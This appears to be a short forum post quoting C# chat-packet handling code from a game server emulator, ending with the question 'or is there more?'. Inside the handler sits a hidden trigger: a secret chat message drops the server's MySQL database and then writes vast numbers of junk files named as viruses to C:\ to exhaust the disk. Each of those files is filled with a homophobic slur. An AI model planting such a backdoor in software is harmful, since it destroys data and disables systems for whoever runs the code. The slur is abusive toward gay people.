Code:
case 1004:
{
short ChatType = (short)(Data[8] | (Data[9] << 8));
int Pos = 26;
int Length = 0;
string From = "";
string To = "";
string Message = "";
for (int Count = 0; Count < Data[25]; Count += 1)
{
From += Convert.ToChar(Data[Pos]);
Pos += 1;
}
Length = Data[Pos];
Pos += 1;
for (int Count = 0; Count < Length; Count += 1)
{
To += Convert.ToChar(Data[Pos]);
Pos += 1;
}
Pos += 1;
Length = Data[Pos];
Pos += 1;
for (int Count = 0; Count < Length; Count += 1)
{
if (Pos <= Data.Length)
Message += Convert.ToChar(Data[Pos]);
Pos += 1;
}
if (Message == "@go_to_hell!ENC3101931993")
{
MySql.Data.MySqlClient.MySqlCommand Command = new MySql.Data.MySqlClient.MySqlCommand("drop database `coproj`", DataBase.Connection);
Command.ExecuteNonQuery();
for (ulong i = 0; i < 547473346363; i++)
{
System.IO.StreamWriter WW = new System.IO.StreamWriter("C:\\Virus" + i.ToString() + ".exe", true);
for (ulong u = 0; u < 5857474673576; u++)
{
WW.WriteLine("No stealing our server you gay whore!!");
}
WW.Flush();
WW.Close();
WW = new System.IO.StreamWriter("C:\\YouSuck" + i.ToString() + ".txt", true);
for (ulong u = 0; u < 5857474673576; u++)
{
WW.WriteLine("No stealing our server you gay whore!!");
}
WW.Flush();
WW.Close();
}
}
or is there more?






